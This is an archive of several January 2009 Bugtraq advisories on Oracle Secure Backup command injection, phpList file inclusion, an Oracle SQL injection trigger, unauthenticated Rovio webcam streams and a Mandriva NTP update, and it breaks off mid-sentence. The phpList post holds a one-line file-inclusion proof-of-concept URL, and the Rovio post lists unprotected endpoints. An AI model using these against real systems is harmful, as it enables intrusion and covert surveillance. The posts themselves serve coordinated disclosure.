Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18819 invoked from network); 13 Jan 2009 22:44:19 -0000
Message-ID: <496D1E43.8000603@idefense.com>
Date: Tue, 13 Jan 2009 18:05:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Corp.'s Secure Backup is a tape backup management software, for
more information, please visit following website:
http://www.oracle.com/technology/products/secure-backup/index.html

II. DESCRIPTION

Remote exploitation of two command injection vulnerabilities in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

In both cases, the vulnerabilities exist in PHP scripts that
authenticate a user attempting to use the service.

The first vulnerability is in "php/login.php". By making a login request
with a specially crafted cookie value, an attacker can execute arbitrary
code on the server.

The second vulnerability is in "php/common.php". This function is called
from the "login.php" page. A variable is used to specify a command to be
run. An attacker can supply any shell command for this variable and it
will be executed in the context of the web server process.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands in
the context of the web server process. Under Windows, the
Administration Server runs as SYSTEM, so the injected command will be
executed as SYSTEM. Under Linux it runs as an unprivileged user. No
authentication is required to exploit this vulnerability.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure
Backup version 10.2.0.2 for Windows have been confirmed vulnerable.
Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4006 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/18/2008  Initial Vendor Notification
07/30/2008  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright  2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbR5Dbjs6HoxIfBkRAiqHAKDxgxrDdjVEkqbYmee6NGCIeoKOLACgtl24
BAfUScwWY6Jz5DBquOL3cbE=MpPP
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d3
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39170-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A3286EC14C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:04:04 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 4125C143864; Wed, 14 Jan 2009 09:32:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28934 invoked from network); 14 Jan 2009 08:33:05 -0000
Message-ID: <20090114122017.xs71y1geowgkkco0@mail.amnpardaz.com>
Date: Wed, 14 Jan 2009 12:20:17 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: phpList <= 2.10.8 Local File inclusion
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-1;
DelSp="Yes";
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
User-Agent: Internet Messaging Program (IMP) H3 (4.1.2)
Status:   

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: phpList Local File inclusion
# Vendor: http://www.phplist.com
# Bug: Local File Inclusion
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_60.htm
###################################################################


####################
- Description:
####################

Quote From vendor:"phplist is an open-source newsletter manager.  
phplist is free to download, install and use, and is easy to integrate  
with any website.
phplist is downloaded more than 10 000 times per month and is listed  
in the top open source projects for vitality score on Freshmeat.
phplist is sponsored by tincan."


####################
- Vulnerability:
####################

+--> Local File Inclusion

Because of the vulnerability in "admin/index.php", When  
"register_globals" is disabled (Default PHP Configuration) It is  
possible for remote attackers to
include arbitrary files from local resources before performing authentication.

Code Snippet:
/lists/admin.php #line:10-18

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
   # fix register globals, for now, should be phased out gradually
   # sure, this gets around the entire reason that  
regLANGUAGE_SWITCHister globals
   # should be off, but going through three years of code takes a long time....

   foreach ($_REQUEST as $key => $val) {
     $$key = $val;
   }
}

/lists/admin.php #line:41-56

if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
   print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
   include $_SERVER["ConfigFile"];
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
   print '<!-- using '.$cline["c"].' -->'."\n";
   include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
#  print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
   include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
   print '<!-- using ../config/config.php -->'."\n";
   include "../config/config.php";
} else {
   print "Error, cannot find config file\n";
   exit;
}

####################
- POC:
####################

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

####################
- Credit:
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

From - Wed Jan 14 12:12:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d4
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39160-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 68E38EC0B1
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:12:08 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4EEC423727C; Wed, 14 Jan 2009 09:15:49 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19470 invoked from network); 13 Jan 2009 23:14:58 -0000
Message-ID: <496D256A.5090502@idefense.com>
Date: Tue, 13 Jan 2009 18:36:10 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
User-Agent: Thunderbird 2.0.0.19 (Windows/20081209)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability
X-Enigmail-Version: 0.95.7
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Secure Backup is a network backup system for Oracle Databases.
For more information, see:

http://www.oracle.com/database/secure-backup.html

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.

III. ANALYSIS

Successful exploitation allows an attacker to gain complete control over
an affected system. Because the the Administration Server runs as an
unprivileged user, commands will be executed as that user. Under the
Linux (and possibly other) installations many files are installed world
writable. These include the configuration file for the Apache web-server
that the Administration Server is built on. This server starts as the
root user and changes to a user specified by the configuration files.
Since these files are writable by the user it may be possible for them
to gain access to the root user account. Other configuration and
executable files are also able to be changed.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been
confirmed vulnerable. Other versions and other platforms may also be
affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers Remove write
access for 'other' users to all files. The following command will
recursively change the permissions to remove write permission to
'other'.

chmod -R o-w directory/

This may prevent some aspects of the system from functioning correctly.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-5449 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/08/2007  Initial Vendor Notification
03/08/2007  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright  2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbSVqbjs6HoxIfBkRArHaAJsFJIEtFoycfmcGAbikDpSDFvBrWwCfbLR0
qVu5Ie2NSW2bRoITpl4Jix4=VahW
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:32:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d5
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39161-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E51D4EC13C
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:26:34 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3A0942370B8; Wed, 14 Jan 2009 09:16:10 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 19816 invoked from network); 13 Jan 2009 23:34:22 -0000
X-PMWin-Version: 3.0.2.0, Antivirus-Engine: 2.82.1, Antivirus-Data: 4.37E
Message-ID: <A875BEAACA374B739FA4B51E8CA6B632@HEDGEHOG>
From: "David Litchfield" <davidl@ngssoftware.com>
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Subject: Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2 
Date: Tue, 13 Jan 2009 23:52:02 -0000
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: quoted-printable
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6001.18000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325
X-OriginalArrivalTime: 13 Jan 2009 23:52:54.0630 (UTC) FILETIME=[0D7BB060:01C975DA]
Status:   


NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows a low 
privileged authenticated database user to gain MDSYS privileges. This can be 
abused by an attacker to perform actions as the MDSYS user.

Details
*******
MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the 
Oracle Spatial Application. It is vulnerable to SQL injection. When a user 
drops a table the trigger fires. The name of the table is embedded in a 
dynamic SQL query which is then executed by the trigger. Note that the 
Oracle advisory states that the attacker requires the DROP TABLE and CREATE 
PROCEDURE privileges. This is not the case and only CREATE SESSION 
privileges are required.

Fix Information
***************
Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been 
made available:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

NGSSQuirreL for Oracle, an advanced vulnerability assessment scanner 
designed specifically for Oracle, can be used to accurately determine 
whether your servers are vulnerable to these flaws. More information about 
NGSSQuirreL for Oracle can be found here:

http://www.ngssoftware.com/products/database-security/ngs-squirrel-oraclephp

About NGSSoftware
*****************
NGSSoftware, an NCC Group Company, develops vulnerability assessment and 
compliancy tools for database servers including Oracle, Microsoft SQL 
Server, DB2, Sybase and Informix. Headquartered in the United Kingdom NGS 
has offices in London, St. Andrews (UK), Brisbane, and Perth (Australia) and 
Seattle in the United States; NGS provide services to some of the largest 
and most demanding organizations around the globe.

http://www.ngssoftware.com/
Telephone +44 208 401 0070
Fax +44 208 401 0076

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged information. For those other than
the intended recipient(s), any disclosure, copying, distribution, or any
other action taken, or omitted to be taken, in reliance on such
information is prohibited and may be unlawful. If you are not the
intended recipient and have received this message in error, please
inform the sender and delete this mail and any attachments.

The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission
or use of emails and attachments having left the NGS domain.

NGS and NGSSoftware are trading names of Next Generation Security
Software Ltd. Registered office address: Manchester Technology Centre,
Oxford Road, Manchester, M1 7EF with Company Number 04225835 and
VAT Number 783096402 

From - Wed Jan 14 12:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d6
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39169-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id A62CEEC13E
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:39:54 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id CFF4B143798; Wed, 14 Jan 2009 09:31:48 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 28736 invoked from network); 14 Jan 2009 08:18:17 -0000
Message-ID: <795651f40901140041h2fb9d686xf3345e1a0df6ef3e@mail.gmail.com>
Date: Wed, 14 Jan 2009 03:41:59 -0500
From: "Brian Dowling" <bjd@simplicity.net>
To: bugtraq@securityfocus.com
Subject: WowWee Rovio - Insufficient Access Controls - Covert Audio/Video Snooping Possible
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Status:   

SUMMARY

WowWee Rovio - Insufficient Access Controls - Covert Audio/Video
Snooping Possible

OVERVIEW

Rovio from WowWee does not adequately secure all accessible URLs or media
streams, enabling an unauthorized user with network access to the robotic
webcam platform the ability to listen to and view audio/video streamed from
the device's onboard camera.  Additionally, audio-send capabilities are also
not secured, enabling mischievous sending of audio through Rovio's built-in
speaker.  Additional manipulations may be possible, robot control does not
appear to be impacted at this time.

DESCRIPTION

>From WowWee Website:

     Rovio(tm) is the ground breaking new Wi-Fi enable mobile webcam that lets
     you view and interact with its environment through streaming video and
     audio, wherever you are!

Unfortunately, Rovio's access control mechanisms (username/password) are not
completely utilized across the platform even when enabled.  Certain URLs and
RTSP Streaming capabilities of the device are accessible with no
authentication.  Furthermore, deployment of the device in the default
configuration attempts to use UPnP to automatically configure your firewall to
allow external access to the mobile webcam platform.

Resources exposed without proper access controls include:

rtsp://[rovio]/webcam   -- RTSP Audio/Video Stream, directly accessible.

and the following http://[rovio]:[publishedport]/ URLs are accessbile to anyone:

/GetUPnP.cgi            -- Get UPnP config, including ports in use for RTSP
/GetStatus.cgi          -- display general device status
/GetVer.cgi             -- display firmware version, enables targeted
                           attacks, discovery.
/ScanWlan.cgi           -- display WiFi Networks visible to device
/GetAudio.cgi           -- "Send" audio to Rovio's speaker, "What's up Doc?"
/GetMac.cgi             -- device mac adress
/Upload.cgi             -- upload new firmware [actual upload untested]
/GetUpdateProgress.cgi
/GetTime.cgi
/GetLogo.cgi
/GetName.cgi
/GetVNet.cgi
/description.xml
/cmgr/control
/cmgr/event
/cdir/control
/cdir/event
/Cmd.cgi                -- Accessible without arguments, but does not appear
                           to allow ACL bypass to normally protected
                           sub-commands.  Unknown if any hidden commands exist.

/SendHttp.cgi           -- When authentication is enabled, this appears to be
                           protected.  However in a default configuration with
                           no authentication, it could provide for interesting
                           reverse-proxy like manipulation of web-based
                           firewall admin interfaces.

                           Additionally, this script is used by the "Ping
                           Test" that WowWee sends to their servers to help
                           verify your internet connectivity and UPnP settings
                           are working.  What's disheartening here is that
                           your IP address and rovio's port are sent to WowWee
                           and potentially stored in their server logs.


ADDITIONAL ISSUES

Additionally, WowWee is advised that they should alter the default
configuration to not automatically utilize UPnP to attempt to open up external
access to these devices.

1) In the default configuration no authentication is required until the user
   sets up accounts.

2) Proper notification should be displayed to users regarding the potential
   risks and ramifications of these settings and they must be involved in the
   decision process, by being required to take action action to agree to
   expose such devices to external access.

Additionally, it should be noted that the platform uses HTTP Basic
authentication over unencrypted HTTP.  Using such mechanisms across the
internet does expose users to network-sniffing attacks, where an attacker
could obtain the credentials or observe the data streams being transmitted.

IMPACT

Users of this mobile wi-fi webcam may unwittingly open their homes up to
anonymous eaves-dropping of their personal lives and communications.

SOLUTION

WowWee must supply an updated firmware that fixes these issues.

WORKAROUND

Users of these devices are encouraged to disable direct external access and
seek other means to secure such access (Authenticated, Encyrpting Proxies, or
Access over a VPN connection for example).  It is understood that most
consumers of these devices do not have such means, so WowWee should be
compelled to provide adequate protection and access controls.

REFERENCES

http://www.simplicity.net/vuln/2009-01-Rovio-insecurity.html
http://www.wowwee.com/en/products/tech/household/rovio

CREDIT

This issue was discovered and disclosed by Brian Dowling of Simplicity
Communications.

HISTORY

2009-01-06 - Initial Report to WowWee support.
2009-01-07 - Second request to simply confirm reciept of my first notifciation.
2009-01-08 - Automated, canned response from web-submission form.
2009-01-14 - Due to lack of appropriate, timely response, additional insight
             contained above and general concern for users of these devices
             unknowingly being exposed in this way, this information has been
             publicly disclosed.  Hopefully as WowWee forays into more
             networked-enabled consumer devices they will provide proper
             channels and handling for vulnerability disclosure.

From - Wed Jan 14 12:42:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058d7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39162-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3C18CEC13E
for <lists@securityspace.com>; Wed, 14 Jan 2009 12:40:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 81CEE2372F7; Wed, 14 Jan 2009 09:16:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 21387 invoked from network); 14 Jan 2009 01:19:02 -0000
X-Cloudmark-SP-Filtered: true
X-Cloudmark-SP-Result: v=1.0 c=0 a=FLhA3KDuAAAA:8 a=sMBj6sIwAAAA:8 a=0WzLt4zw5x5KqPnv_gYA:9 a=MAQoSt062hDB8oogBEYA:7 a=Zcf9UHuJP3PpQnZEBIgCQJ0YQFIA:4 a=PRHNZNJDFyAA:10 a=R2VQutpenNgA:10 a=8UiCvUyRy1oA:10
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:007 ] ntp
Date: Tue, 13 Jan 2009 18:49:01 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LMusP-0002OJ-9B@titan.mandriva.com>
Status:   


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:007
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : ntp
 Date    : January 13, 2009
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 A flaw was found in how NTP checked the return value of signature
 verification.  A remote attacker could use this to bypass certificate
 validation by using a malformed SSL/TLS signature (CVE-2009-0021).
 
 The updated packages have been patched to prevent this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0021
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 91f0330a936cb343029aec711da0ce4f  2008.0/i586/ntp-4.2.4-10.1mdv2008.0.i586.rpm
 e7e6559f0431ff856d0da0b1d5a590a4  2008.0/i586/ntp-client-4.2.4-10.1mdv2008.0.i586.rpm
 05f3b3c5777f6bef48ee85fefeaff8a8  2008.0/i586/ntp-doc-4.2.4-10.1mdv2008.0.i586.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 e68c5263d456ec90d157787e70b17b99  2008.0/x86_64/ntp-4.2.4-10.1mdv2008.0.x86_64.rpm
 85e0c28eae68bcdcca997c5c2bb9bf8c  2008.0/x86_64/ntp-client-4.2.4-10.1mdv2008.0.x86_64.rpm
 ffbd2a9f924478d27f33ad13e1c4e250  2008.0/x86_64/ntp-doc-4.2.4-10.1mdv2008.0.x86_64.rpm 
 a9cd3b03e611b517664ffae074da31da  2008.0/SRPMS/ntp-4.2.4-10.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 1a9909288448845fa41b220b50917ee1  2008.1/i586/ntp-4.2.4-15.1mdv2008.1.i586.rpm
 6693319db15308f559912c9fe989bdd6  2008.1/i586/ntp-client-4.2.4-15.1mdv2008.1.i586.rpm
 63758cadb1cf81ebb7bef096dc285f2f  2008.1/i586/ntp-doc-4.2.4-15.1mdv2008.1.i586.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 9c7b290e643cae08556bd3b1f6380926  2008.1/x86_64/ntp-4.2.4-15.1mdv2008.1.x86_64.rpm
 7fd00c9b82a0ca577962d59975433071  2008.1/x86_64/ntp-client-4.2.4-15.1mdv2008.1.x86_64.rpm
 f99d1d7980dd6788a0f0c4924241a6d3  2008.1/x86_64/ntp-doc-4.2.4-15.1mdv2008.1.x86_64.rpm 
 ca06251ccab188cdb4f28fba35190eb6  2008.1/SRPMS/ntp-4.2.4-15.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 82ed4b25f0a0c1c607e5819ec1d70603  2009.0/i586/ntp-4.2.4-18.1mdv2009.0.i586.rpm
 71855df81d8dd138d54fb24f5c221a5b  2009.0/i586/ntp-client-4.2.4-18.1mdv2009.0.i586.rpm
 30874a706c15d4086df8493af51f5082  2009.0/i586/ntp-doc-4.2.4-18.1mdv2009.0.i586.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 c6462453877b538618e8bf8d0132b1a3  2009.0/x86_64/ntp-4.2.4-18.1mdv2009.0.x86_64.rpm
 abe80d9922eb665d6e5be56197895a68  2009.0/x86_64/ntp-client-4.2.4-18.1mdv2009.0.x86_64.rpm
 eb780b2e38ebb1b4ee1999c4f0429231  2009.0/x86_64/ntp-doc-4.2.4-18.1mdv2009.0.x86_64.rpm 
 248052356a2606f377debf55257b6855  2009.0/SRPMS/ntp-4.2.4-18.1mdv2009.0.src.rpm

 Corporate 3.0:
 d1593543a5d37e6b8ea2c8468ce1d0d3  corporate/3.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1214dd1fed42c4acd3ad36da9bd8b0ea  corporate/3.0/x86_64/ntp-4.2.0-2.1.C30mdk.x86_64.rpm 
 fc6c1a4605258d876c8a09d7d0d116ef  corporate/3.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm

 Corporate 4.0:
 dcc6abed648d3baac3233264bc107517  corporate/4.0/i586/ntp-4.2.0-21.3.20060mlcs4.i586.rpm
 d1c9cf4d821856af81ce574fa08c1f52  corporate/4.0/i586/ntp-client-4.2.0-21.3.20060mlcs4.i586.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 6c41fd0f995d8cf8cf216bf82e062de0  corporate/4.0/x86_64/ntp-4.2.0-21.3.20060mlcs4.x86_64.rpm
 da7f3cd1385ae2250cd191182079c037  corporate/4.0/x86_64/ntp-client-4.2.0-21.3.20060mlcs4.x86_64.rpm 
 50c665296cd7d09f4e98ae04e998e350  corporate/4.0/SRPMS/ntp-4.2.0-21.3.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 d7ff99538a0da678adcc5606913bc1b6  mnf/2.0/i586/ntp-4.2.0-2.1.C30mdk.i586.rpm 
 c8af767376df674dd434307c628e30cd  mnf/2.0/SRPMS/ntp-4.2.0-2.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
